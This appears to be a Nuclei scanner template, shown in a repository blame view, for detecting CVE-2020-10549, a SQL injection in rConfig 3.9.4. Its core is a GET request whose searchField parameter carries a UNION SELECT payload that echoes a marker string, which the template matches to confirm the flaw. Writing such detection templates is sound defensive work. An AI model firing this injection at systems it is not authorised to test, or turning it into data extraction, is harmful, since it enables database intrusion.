nuclei-templates/cves/2020/CVE-2020-10549.yaml

22 lines
645 B
YAML
Raw Normal View History

2021-02-14 19:38:42 +00:00
id: CVE-2020-10549
info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
2021-02-15 19:05:52 +00:00
tags: cve,cve2020,rconfig,sqli
2021-02-14 19:38:42 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body